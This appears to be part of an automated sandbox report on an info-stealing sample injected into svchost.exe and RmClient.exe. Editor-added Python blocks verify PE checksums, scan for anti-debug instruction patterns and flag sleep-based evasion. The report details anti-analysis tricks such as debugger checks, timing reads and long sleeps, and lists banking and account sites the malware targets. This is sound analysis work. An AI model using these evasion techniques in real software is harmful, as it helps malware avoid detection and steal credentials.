            Source: Binary string: svchost.pdb source: RmClient.exe, 00000005.00000002.4591201110.000000000341C000.00000004.10000000.00040000.00000000.sdmp, RmClient.exe, 00000005.00000002.4588947900.000000000096D000.00000004.00000020.00020000.00000000.sdmp, avmjQSNkeFbUoa.exe, 00000006.00000000.2442714328.00000000032CC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2664524956.00000000006DC000.00000004.80000000.00040000.00000000.sdmp
            Source: Binary string: svchost.pdbUGP source: RmClient.exe, 00000005.00000002.4591201110.000000000341C000.00000004.10000000.00040000.00000000.sdmp, RmClient.exe, 00000005.00000002.4588947900.000000000096D000.00000004.00000020.00020000.00000000.sdmp, avmjQSNkeFbUoa.exe, 00000006.00000000.2442714328.00000000032CC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2664524956.00000000006DC000.00000004.80000000.00040000.00000000.sdmp
            Source: Binary string: RmClient.pdb source: svchost.exe, 00000002.00000002.2374917499.0000000003000000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2374956046.0000000003019000.00000004.00000020.00020000.00000000.sdmp, avmjQSNkeFbUoa.exe, 00000003.00000002.4589350365.0000000000998000.00000004.00000020.00020000.00000000.sdmp
            Source: C:\Users\user\Desktop\enkJ6J7dAn.exe | Code function: 0_2_0040EBD0 LoadLibraryA,GetProcAddress
            Source: enkJ6J7dAn.exe | Static PE information: real checksum: 0xa961f should be: 0x15e23b
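The row above reports the stored IMAGE_OPTIONAL_HEADER.CheckSum (0xa961f) against the value the file should carry (0x15e23b). Windows only enforces this checksum for kernel drivers and a few boot-time system DLLs, so the mismatch does not stop the sample from running; it tells the analyst the image was altered after linking (packed, patched or padded), which is why sandboxes flag it. The code below is an added example by the editor, not Joe Sandbox or pefile code, implementing the documented PE checksum (fold the file as 32-bit words with the CheckSum field treated as zero, fold the carries to 16 bits, add the file length) with the standard library only; the minimal PE32 image it builds for testing is constructed here and is not loadable.

```python
"""Recompute and verify the PE header checksum (added example, stdlib only)."""
import struct


def _checksum_offset(data: bytes) -> int:
    """File offset of IMAGE_OPTIONAL_HEADER.CheckSum (optional header + 0x40)."""
    if data[:2] != b"MZ":
        raise ValueError("not an MZ image")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("bad PE signature")
    # 4-byte signature + 20-byte IMAGE_FILE_HEADER, then CheckSum at +0x40
    return e_lfanew + 4 + 20 + 0x40


def pe_checksum(data: bytes) -> int:
    """The value Windows' CheckSumMappedFile would compute for this file."""
    cs_off = _checksum_offset(data)
    buf = bytearray(data) + b"\0" * (-len(data) % 4)   # pad to a dword multiple
    struct.pack_into("<I", buf, cs_off, 0)               # the field itself counts as zero
    total = 0
    for off in range(0, len(buf), 4):
        total += struct.unpack_from("<I", buf, off)[0]
        if total > 0xFFFFFFFF:                           # end-around carry at 32 bits
            total = (total & 0xFFFFFFFF) + (total >> 32)
    total = (total & 0xFFFF) + (total >> 16)             # fold to 16 bits
    total += total >> 16
    return (total & 0xFFFF) + len(data)                  # plus the original file length


def stored_checksum(data: bytes) -> int:
    return struct.unpack_from("<I", data, _checksum_offset(data))[0]


def checksum_report(data: bytes):
    """(stored, computed, matches), the same three facts as the report row."""
    stored, computed = stored_checksum(data), pe_checksum(data)
    return stored, computed, stored == computed


def fix_checksum(data: bytes) -> bytes:
    """Return a copy with the correct checksum written into the header."""
    buf = bytearray(data)
    struct.pack_into("<I", buf, _checksum_offset(buf), pe_checksum(data))
    return bytes(buf)


def build_minimal_pe32(size: int = 512) -> bytes:
    """Constructed test image: DOS stub, PE signature, file header and a PE32
    optional header with CheckSum left at zero. Header-only, not runnable."""
    buf = bytearray(size)
    buf[:2] = b"MZ"
    struct.pack_into("<I", buf, 0x3C, 0x40)                 # e_lfanew
    buf[0x40:0x44] = b"PE\0\0"
    # Machine=i386, 0 sections, stamp, symtab ptr, nsyms, opt hdr size=0xE0,
    # Characteristics = EXECUTABLE_IMAGE | 32BIT_MACHINE
    struct.pack_into("<HHIIIHH", buf, 0x44, 0x14C, 0, 0, 0, 0, 0xE0, 0x0102)
    struct.pack_into("<H", buf, 0x58, 0x10B)                # PE32 magic
    return bytes(buf)


if __name__ == "__main__":
    image = build_minimal_pe32()
    print("stored 0x%x computed 0x%x ok=%s" % checksum_report(image))
    print("after fix: ok=%s" % checksum_report(fix_checksum(image))[2])
```

To reproduce the row above on the real sample, read the file and call `checksum_report()`; because the field is zeroed before summing, writing the corrected value back does not change the computed result, which is the property `fix_checksum()` relies on.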
            Source: C:\Users\user\Desktop\enkJ6J7dAn.exe | Code function: 0_2_00416CB5 push ecx; ret 0_2_00416CC8
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_004033B0 push eax; ret 2_2_004033B2
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_004234C3 push edi; retf 2_2_004234CE
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_00401724 push 0000007Ch; iretd 2_2_00401726
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0360225F pushad ; ret 2_2_036027F9
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_036027FA pushad ; ret 2_2_036027F9
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_036309AD push ecx; mov dword ptr [esp], ecx 2_2_036309B6
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0360283D push eax; iretd 2_2_03602858
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0360135F push eax; iretd 2_2_03601369
            Source: C:\Program Files (x86)\qMMscfYOaJVsvvwoxWKNjVjKgsZGdwzfiNkZOTOmcvHeNyaGgZTijVCYOWGYEWnlX\avmjQSNkeFbUoa.exe | Code function: 3_2_029ED49C push ds; retf 3_2_029ED4B0
            Source: C:\Windows\SysWOW64\RmClient.exe | Code function: 5_2_02DF225F pushad ; ret 5_2_02DF27F9
            Source: C:\Windows\SysWOW64\RmClient.exe | Code function: 5_2_02DF27FA pushad ; ret 5_2_02DF27F9
            Source: C:\Windows\SysWOW64\RmClient.exe | Code function: 5_2_02DF283D push eax; iretd 5_2_02DF2858
            Source: C:\Windows\SysWOW64\RmClient.exe | Code function: 5_2_02E209AD push ecx; mov dword ptr [esp], ecx 5_2_02E209B6
            Source: C:\Windows\SysWOW64\RmClient.exe | Code function: 5_2_02DF1368 push eax; iretd 5_2_02DF1369
            Source: C:\Windows\SysWOW64\RmClient.exe | Code function: 5_2_006A0110 push edi; retf 5_2_006A011B
            Source: C:\Windows\SysWOW64\RmClient.exe | Code function: 5_2_00692260 push ds; retf 5_2_00692274
            Source: C:\Windows\SysWOW64\RmClient.exe | Code function: 5_2_006A0365 push ebp; ret 5_2_006A0367
            Source: C:\Windows\SysWOW64\RmClient.exe | Code function: 5_2_006A038C push ecx; iretd 5_2_006A038F
            Source: C:\Windows\SysWOW64\RmClient.exe | Code function: 5_2_00697338 push ds; ret 5_2_0069733C
            Source: C:\Windows\SysWOW64\RmClient.exe | Code function: 5_2_0069B602 pushfd ; ret 5_2_0069B604
            Source: C:\Windows\SysWOW64\RmClient.exe | Code function: 5_2_02CEC308 push cs; ret 5_2_02CEC309
            Source: C:\Windows\SysWOW64\RmClient.exe | Code function: 5_2_02CF5052 push eax; ret 5_2_02CF5054
            Source: C:\Windows\SysWOW64\RmClient.exe | Code function: 5_2_02CEF06A push ebp; iretd 5_2_02CEF072
            Source: C:\Windows\SysWOW64\RmClient.exe | Code function: 5_2_02CE56F8 pushad ; iretd 5_2_02CE573F
            Source: C:\Windows\SysWOW64\RmClient.exe | Code function: 5_2_02CE25EE push ebp; ret 5_2_02CE25EF
            Source: C:\Windows\SysWOW64\RmClient.exe | Code function: 5_2_02CE857A push es; retf 5_2_02CE8584
            Source: C:\Windows\SysWOW64\RmClient.exe | Code function: 5_2_02CEBFE5 push cs; retf 5_2_02CEBFEF
            Source: C:\Windows\SysWOW64\RmClient.exe | Code function: 5_2_02CE4C7E push 00000021h; retf 5_2_02CE4C80
            Source: C:\Users\user\Desktop\enkJ6J7dAn.exe | Code function: 0_2_0047A330 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed
            Source: C:\Users\user\Desktop\enkJ6J7dAn.exe | Code function: 0_2_00434418 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput
            Source: C:\Users\user\Desktop\enkJ6J7dAn.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\RmClient.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\RmClient.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\RmClient.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\RmClient.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\RmClient.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
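            Two of the findings above can be reproduced statically outside the sandbox: the PE CheckSum mismatch ("real checksum ... should be ...") and the push/ret, pushad/ret and push imm8/iretd sequences, together with the rdtsc and fs:[30h] PEB reads the report lists under its anti-debugging findings. The script below is an added example, not Joe Sandbox's code, and it runs on a constructed PE-shaped buffer rather than the analyzed sample. It assumes the CheckSum algorithm as implemented by imagehlp and reimplemented by pefile, 32-bit x86 encodings (the injected processes here run under SysWOW64), and a linear byte scan rather than a disassembler, so it will also match data bytes that happen to look like code.

```python
"""Added example (not Joe Sandbox code): static PE triage for the CheckSum
and instruction-sequence findings, on a constructed PE-shaped buffer."""
from __future__ import annotations

import struct

# --- 1. IMAGE_OPTIONAL_HEADER.CheckSum ------------------------------------

def checksum_offset(data: bytes) -> int:
    """File offset of the CheckSum field (same 0x40 offset in PE32 and PE32+)."""
    if data[:2] != b"MZ":
        raise ValueError("missing MZ header")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    return e_lfanew + 4 + 20 + 0x40        # signature + IMAGE_FILE_HEADER + 0x40


def pe_checksum(data: bytes) -> tuple[int, int]:
    """Return (stored, computed). Algorithm as in imagehlp/pefile: end-around
    carry sum of every dword except the CheckSum field itself, folded to
    16 bits, plus the file length."""
    cks_off = checksum_offset(data)
    stored = struct.unpack_from("<I", data, cks_off)[0]
    padded = data + b"\0" * (-len(data) % 4)
    total = 0
    for off in range(0, len(padded), 4):
        if off == cks_off - cks_off % 4:     # skip the dword holding CheckSum
            continue
        total += struct.unpack_from("<I", padded, off)[0]
        if total >= 1 << 32:                 # end-around carry
            total = (total & 0xFFFFFFFF) + (total >> 32)
    total = (total & 0xFFFF) + (total >> 16)
    total += total >> 16
    return stored, (total & 0xFFFF) + len(data)


def patch_checksum(data: bytes, value: int) -> bytes:
    """Write a CheckSum into the header (what a build or packer step that
    fixes the field up would do)."""
    buf = bytearray(data)
    struct.pack_into("<I", buf, checksum_offset(data), value)
    return bytes(buf)

# --- 2. instruction sequences behind the "Code function" findings ---------

PUSH1 = {0x06: "push es", 0x0E: "push cs", 0x16: "push ss", 0x1E: "push ds",
         0x60: "pushad", 0x9C: "pushfd"}
PUSH1.update({0x50 + i: "push " + r for i, r in
              enumerate(["eax", "ecx", "edx", "ebx", "esp", "ebp", "esi", "edi"])})
RET1 = {0xC3: "ret", 0xCB: "retf", 0xCF: "iretd"}
FIXED = {b"\x0f\x31": "rdtsc",                                   # timing check
         b"\x64\xa1\x30\x00\x00\x00": "mov eax, fs:[30h]",       # PEB read
         b"\x64\x8b\x0d\x30\x00\x00\x00": "mov ecx, fs:[30h]"}   # PEB read


def scan_code(data: bytes) -> list[tuple[int, str]]:
    """Linear scan for the sequences above; returns (offset, description)."""
    hits, i, n = [], 0, len(data)
    while i < n:
        for pat, name in FIXED.items():
            if data.startswith(pat, i):
                hits.append((i, name))
                i += len(pat)
                break
        else:
            b = data[i]
            if b in PUSH1 and i + 1 < n and data[i + 1] in RET1:
                hits.append((i, f"{PUSH1[b]}; {RET1[data[i + 1]]}"))
                i += 2
            elif b == 0x6A and i + 2 < n and data[i + 2] in RET1:   # push imm8
                hits.append((i, f"push {data[i + 1]:02X}h; {RET1[data[i + 2]]}"))
                i += 3
            else:
                i += 1
    return hits


def triage(data: bytes) -> dict:
    stored, computed = pe_checksum(data)
    return {"checksum_ok": stored == computed, "stored": stored,
            "computed": computed, "hits": scan_code(data)}

# --- constructed sample: minimal headers plus 16 bytes of hand-made code ---

CODE = bytes.fromhex(
    "64a130000000"   # mov eax, fs:[30h]        ; PEB
    "0fb64002"       # movzx eax, byte [eax+2]  ; PEB.BeingDebugged
    "0f31"           # rdtsc
    "50c3"           # push eax; ret
    "60c3"           # pushad; ret
)


def build_sample() -> bytes:
    img = bytearray(0x100)
    img[0:2] = b"MZ"
    struct.pack_into("<I", img, 0x3C, 0x40)         # e_lfanew
    img[0x40:0x44] = b"PE\0\0"
    struct.pack_into("<H", img, 0x58, 0x10B)        # OptionalHeader.Magic, PE32
    struct.pack_into("<I", img, 0x98, 0xDEADBEEF)   # bogus stored CheckSum
    img[0xC0:0xC0 + len(CODE)] = CODE
    return bytes(img)


SAMPLE = build_sample()

if __name__ == "__main__":
    print(triage(SAMPLE))
```

            A stored CheckSum that does not match is common in unsigned or repacked user-mode binaries, because the loader only enforces the field for drivers and a few system images; on its own it is a weak signal, which is why the report lists it without raising the score on it.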

            Malware Analysis System Evasion

            Source: C:\Users\user\Desktop\enkJ6J7dAn.exe API/Special instruction interceptor: Address: 420A26C
            Source: C:\Windows\SysWOW64\RmClient.exe API/Special instruction interceptor: Address: 7FF8C88ED324
            Source: C:\Windows\SysWOW64\RmClient.exe API/Special instruction interceptor: Address: 7FF8C88ED7E4
            Source: C:\Windows\SysWOW64\RmClient.exe API/Special instruction interceptor: Address: 7FF8C88ED944
            Source: C:\Windows\SysWOW64\RmClient.exe API/Special instruction interceptor: Address: 7FF8C88ED504
            Source: C:\Windows\SysWOW64\RmClient.exe API/Special instruction interceptor: Address: 7FF8C88ED544
            Source: C:\Windows\SysWOW64\RmClient.exe API/Special instruction interceptor: Address: 7FF8C88ED1E4
            Source: C:\Windows\SysWOW64\RmClient.exe API/Special instruction interceptor: Address: 7FF8C88F0154
            Source: C:\Windows\SysWOW64\RmClient.exe API/Special instruction interceptor: Address: 7FF8C88EDA44
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0367096E rdtsc 2_2_0367096E
            Source: C:\Windows\SysWOW64\RmClient.exe Window / User API: threadDelayed 9816
            Source: C:\Users\user\Desktop\enkJ6J7dAn.exe Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes graph_0-87533
            Source: C:\Users\user\Desktop\enkJ6J7dAn.exe API coverage: 3.5 %
            Source: C:\Windows\SysWOW64\svchost.exe API coverage: 0.7 %
            Source: C:\Windows\SysWOW64\RmClient.exe API coverage: 2.6 %
            Source: C:\Windows\SysWOW64\RmClient.exe TID: 5324 Thread sleep count: 157 > 30
            Source: C:\Windows\SysWOW64\RmClient.exe TID: 5324 Thread sleep time: -314000s >= -30000s
            Source: C:\Windows\SysWOW64\RmClient.exe TID: 5324 Thread sleep count: 9816 > 30
            Source: C:\Windows\SysWOW64\RmClient.exe TID: 5324 Thread sleep time: -19632000s >= -30000s
            Source: C:\Program Files (x86)\qMMscfYOaJVsvvwoxWKNjVjKgsZGdwzfiNkZOTOmcvHeNyaGgZTijVCYOWGYEWnlX\avmjQSNkeFbUoa.exe TID: 5628 Thread sleep time: -70000s >= -30000s
            Source: C:\Program Files (x86)\qMMscfYOaJVsvvwoxWKNjVjKgsZGdwzfiNkZOTOmcvHeNyaGgZTijVCYOWGYEWnlX\avmjQSNkeFbUoa.exe TID: 5628 Thread sleep count: 36 > 30
            Source: C:\Program Files (x86)\qMMscfYOaJVsvvwoxWKNjVjKgsZGdwzfiNkZOTOmcvHeNyaGgZTijVCYOWGYEWnlX\avmjQSNkeFbUoa.exe TID: 5628 Thread sleep time: -54000s >= -30000s
            Source: C:\Program Files (x86)\qMMscfYOaJVsvvwoxWKNjVjKgsZGdwzfiNkZOTOmcvHeNyaGgZTijVCYOWGYEWnlX\avmjQSNkeFbUoa.exe TID: 5628 Thread sleep count: 41 > 30
            Source: C:\Program Files (x86)\qMMscfYOaJVsvvwoxWKNjVjKgsZGdwzfiNkZOTOmcvHeNyaGgZTijVCYOWGYEWnlX\avmjQSNkeFbUoa.exe TID: 5628 Thread sleep time: -41000s >= -30000s
            Source: C:\Windows\SysWOW64\RmClient.exe Last function: Thread delayed
            Source: C:\Windows\SysWOW64\RmClient.exe Last function: Thread delayed
            Source: C:\Users\user\Desktop\enkJ6J7dAn.exe Code function: 0_2_00452492 FindFirstFileW,Sleep,FindNextFileW,FindClose, 0_2_00452492
            Source: C:\Users\user\Desktop\enkJ6J7dAn.exe Code function: 0_2_00442886 FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 0_2_00442886
            Source: C:\Users\user\Desktop\enkJ6J7dAn.exe Code function: 0_2_004788BD FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf, 0_2_004788BD
            Source: C:\Users\user\Desktop\enkJ6J7dAn.exe Code function: 0_2_004339B6 GetFileAttributesW,FindFirstFileW,FindClose, 0_2_004339B6
            Source: C:\Users\user\Desktop\enkJ6J7dAn.exe Code function: 0_2_0045CAFA FindFirstFileW,FindNextFileW,FindClose, 0_2_0045CAFA
            Source: C:\Users\user\Desktop\enkJ6J7dAn.exe Code function: 0_2_00431A86 FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 0_2_00431A86
            Source: C:\Users\user\Desktop\enkJ6J7dAn.exe Code function: 0_2_0044BD27 _wcscat,_wcscat,__wsplitpath,FindFirstFileW,CopyFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindClose,MoveFileW,FindNextFileW,FindClose, 0_2_0044BD27
            Source: C:\Users\user\Desktop\enkJ6J7dAn.exe Code function: 0_2_0045DE8F FindFirstFileW,FindClose, 0_2_0045DE8F
            Source: C:\Users\user\Desktop\enkJ6J7dAn.exe Code function: 0_2_0044BF8B _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,FindClose, 0_2_0044BF8B
            Source: C:\Windows\SysWOW64\RmClient.exe Code function: 5_2_0069C280 FindFirstFileW,FindNextFileW,FindClose, 5_2_0069C280
            Source: C:\Users\user\Desktop\enkJ6J7dAn.exe Code function: 0_2_0040E500 GetVersionExW,GetCurrentProcess,GetNativeSystemInfo,FreeLibrary,FreeLibrary,FreeLibrary,GetSystemInfo,GetSystemInfo,FreeLibrary, 0_2_0040E500
            Source: 661035W.5.dr Binary or memory string: Canara Transaction PasswordVMware20,11696428655x
            Source: 661035W.5.dr Binary or memory string: discord.comVMware20,11696428655f
            Source: 661035W.5.dr Binary or memory string: interactivebrokers.co.inVMware20,11696428655d
            Source: 661035W.5.dr Binary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
            Source: 661035W.5.dr Binary or memory string: global block list test formVMware20,11696428655
            Source: 661035W.5.dr Binary or memory string: Canara Transaction PasswordVMware20,11696428655}
            Source: 661035W.5.dr Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
            Source: 661035W.5.dr Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
            Source: 661035W.5.dr Binary or memory string: account.microsoft.com/profileVMware20,11696428655u
            Source: RmClient.exe, 00000005.00000002.4588947900.000000000096D000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll]
            Source: 661035W.5.dr Binary or memory string: secure.bankofamerica.comVMware20,11696428655|UE
            Source: 661035W.5.dr Binary or memory string: www.interactivebrokers.comVMware20,11696428655}
            Source: 661035W.5.dr Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
            Source: 661035W.5.dr Binary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
            Source: 661035W.5.dr Binary or memory string: outlook.office365.comVMware20,11696428655t
            Source: 661035W.5.dr Binary or memory string: microsoft.visualstudio.comVMware20,11696428655x
            Source: firefox.exe, 00000008.00000002.2665973894.000002AC8059C000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
            Source: 661035W.5.dr Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655
            Source: 661035W.5.dr Binary or memory string: outlook.office.comVMware20,11696428655s
            Source: 661035W.5.dr Binary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
            Source: 661035W.5.dr Binary or memory string: ms.portal.azure.comVMware20,11696428655
            Source: 661035W.5.dr Binary or memory string: AMC password management pageVMware20,11696428655
            Source: 661035W.5.dr Binary or memory string: tasks.office.comVMware20,11696428655o
            Source: avmjQSNkeFbUoa.exe, 00000006.00000002.4589578770.000000000152F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll<
            Source: 661035W.5.dr Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
            Source: 661035W.5.dr Binary or memory string: turbotax.intuit.comVMware20,11696428655t
            Source: 661035W.5.dr Binary or memory string: interactivebrokers.comVMware20,11696428655
            Source: 661035W.5.dr Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
            Source: 661035W.5.dr Binary or memory string: dev.azure.comVMware20,11696428655j
            Source: 661035W.5.dr Binary or memory string: netportal.hdfcbank.comVMware20,11696428655
            Source: 661035W.5.dr Binary or memory string: Interactive Brokers - HKVMware20,11696428655]
            Source: 661035W.5.dr Binary or memory string: bankofamerica.comVMware20,11696428655x
            Source: 661035W.5.dr Binary or memory string: trackpan.utiitsl.comVMware20,11696428655h
            Source: 661035W.5.dr Binary or memory string: Test URL for global passwords blocklistVMware20,11696428655
            Source: C:\Users\user\Desktop\enkJ6J7dAn.exe API call chain: ExitProcess graph end node graph_0-86663
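            The sleep findings above (thread 5324: 157 delays adding up to 314000, later 9816 delays adding up to 19632000, each compared against 30 calls and 30000) are a count-and-duration rule over NtDelayExecution calls. The script below is an added example of that rule over a constructed call trace; it is not Joe Sandbox's rule engine and the trace format, process id and benign threads are invented. It assumes the report's figures are milliseconds (157 × 2000 ms = 314000 matches the count/time pair shown) and that the leading minus sign reflects how NtDelayExecution encodes a relative delay: a negative LARGE_INTEGER in 100 ns units, while a positive value is an absolute system time that cannot be turned into a duration offline.

```python
"""Added example (not Joe Sandbox code): the 'sleep count > 30' and
'sleep time >= 30000 ms' evasion rule over a constructed NtDelayExecution
trace."""
from __future__ import annotations

import re
from collections import defaultdict

LINE = re.compile(r"pid=(\d+) tid=(\d+) NtDelayExecution alertable=[01] interval=(-?\d+)")


def relative_ms(interval: int) -> float | None:
    """Interval is a LARGE_INTEGER in 100 ns units: negative means a relative
    delay, positive an absolute system time (no duration without the clock)."""
    return -interval / 10_000 if interval < 0 else None


def parse_trace(text: str) -> dict[tuple[int, int], list[float]]:
    """Group relative delays (ms) by (pid, tid); absolute-time waits are
    dropped because their length depends on the sample's view of the clock."""
    sleeps: dict[tuple[int, int], list[float]] = defaultdict(list)
    for line in text.splitlines():
        m = LINE.match(line)
        if not m:
            continue
        pid, tid, interval = (int(x) for x in m.groups())
        ms = relative_ms(interval)
        if ms is not None:
            sleeps[(pid, tid)].append(ms)
    return dict(sleeps)


def evaluate(sleeps: dict[tuple[int, int], list[float]],
             max_count: int = 30, max_total_ms: float = 30_000) -> list[dict]:
    """Flag threads that sleep too often or for too long in total; the two
    thresholds are the ones the report compares against."""
    findings = []
    for (pid, tid), delays in sorted(sleeps.items()):
        count, total = len(delays), sum(delays)
        rules = []
        if count > max_count:
            rules.append(f"sleep count {count} > {max_count}")
        if total >= max_total_ms:
            rules.append(f"sleep time {total:.0f} ms >= {max_total_ms:.0f} ms")
        if rules:
            findings.append({"pid": pid, "tid": tid, "count": count,
                             "total_ms": total, "rules": rules})
    return findings


def trace_lines(pid: int, tid: int, interval: int, n: int) -> list[str]:
    return [f"pid={pid} tid={tid} NtDelayExecution alertable=0 interval={interval}"
            for _ in range(n)]


# Constructed trace (pid 5236 is invented): thread 5324 mirrors the report's
# first pair of figures, the other threads show benign and borderline cases.
TRACE = "\n".join(
    trace_lines(5236, 5324, -20_000_000, 157)          # 157 x 2 s relative delays
    + trace_lines(5236, 6012, -1_000_000, 5)           # 5 x 100 ms: ordinary polling
    + trace_lines(5236, 6100, -150_000_000, 3)         # 3 x 15 s: few calls, long total
    + trace_lines(5236, 6200, 133_000_000_000_000_000, 1)  # absolute wake-up time
)

if __name__ == "__main__":
    for f in evaluate(parse_trace(TRACE)):
        print(f"tid {f['tid']}: {f['count']} sleeps, {f['total_ms']:.0f} ms, "
              + "; ".join(f["rules"]))
```

            Thread 6100 trips only the duration rule, which is why the report carries both comparisons: a loader that sleeps a handful of times for long periods and one that sleeps thousands of times for short periods are both trying to outlast the analysis window, and either rule alone would miss one of them.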
            Source: C:\Windows\SysWOW64\svchost.exe Process information queried: ProcessInformation
            Source: C:\Windows\SysWOW64\svchost.exe Process queried: DebugPort
            Source: C:\Windows\SysWOW64\RmClient.exe Process queried: DebugPort
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0367096E rdtsc 2_2_0367096E
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_00417583 LdrLoadDll, 2_2_00417583
            Source: C:\Users\user\Desktop\enkJ6J7dAn.exe Code function: 0_2_0045A370 BlockInput, 0_2_0045A370
            Source: C:\Users\user\Desktop\enkJ6J7dAn.exe Code function: 0_2_0040D590 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetModuleFileNameW,GetForegroundWindow,ShellExecuteW,GetForegroundWindow,ShellExecuteW, 0_2_0040D590
            Source: C:\Users\user\Desktop\enkJ6J7dAn.exe Code function: 0_2_0040EBD0 LoadLibraryA,GetProcAddress, 0_2_0040EBD0
            Source: C:\Users\user\Desktop\enkJ6J7dAn.exe Code function: 0_2_0420A4D8 mov eax, dword ptr fs:[00000030h] 0_2_0420A4D8
            Source: C:\Users\user\Desktop\enkJ6J7dAn.exe Code function: 0_2_0420A538 mov eax, dword ptr fs:[00000030h] 0_2_0420A538
            Source: C:\Users\user\Desktop\enkJ6J7dAn.exe Code function: 0_2_04208E88 mov eax, dword ptr fs:[00000030h] 0_2_04208E88
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_036D437C mov eax, dword ptr fs:[00000030h] 2_2_036D437C
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_036B2349 mov eax, dword ptr fs:[00000030h] 2_2_036B2349
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_036B2349 mov eax, dword ptr fs:[00000030h] 2_2_036B2349
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_036B2349 mov eax, dword ptr fs:[00000030h] 2_2_036B2349
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_036B2349 mov eax, dword ptr fs:[00000030h] 2_2_036B2349
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_036B2349 mov eax, dword ptr fs:[00000030h] 2_2_036B2349
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_036B2349 mov eax, dword ptr fs:[00000030h] 2_2_036B2349
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_036B2349 mov eax, dword ptr fs:[00000030h] 2_2_036B2349
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_036B2349 mov eax, dword ptr fs:[00000030h] 2_2_036B2349
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_036B2349 mov eax, dword ptr fs:[00000030h] 2_2_036B2349
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_036B2349 mov eax, dword ptr fs:[00000030h] 2_2_036B2349
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_036B2349 mov eax, dword ptr fs:[00000030h] 2_2_036B2349
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_036B2349 mov eax, dword ptr fs:[00000030h] 2_2_036B2349
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_036B2349 mov eax, dword ptr fs:[00000030h] 2_2_036B2349
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_036B2349 mov eax, dword ptr fs:[00000030h] 2_2_036B2349
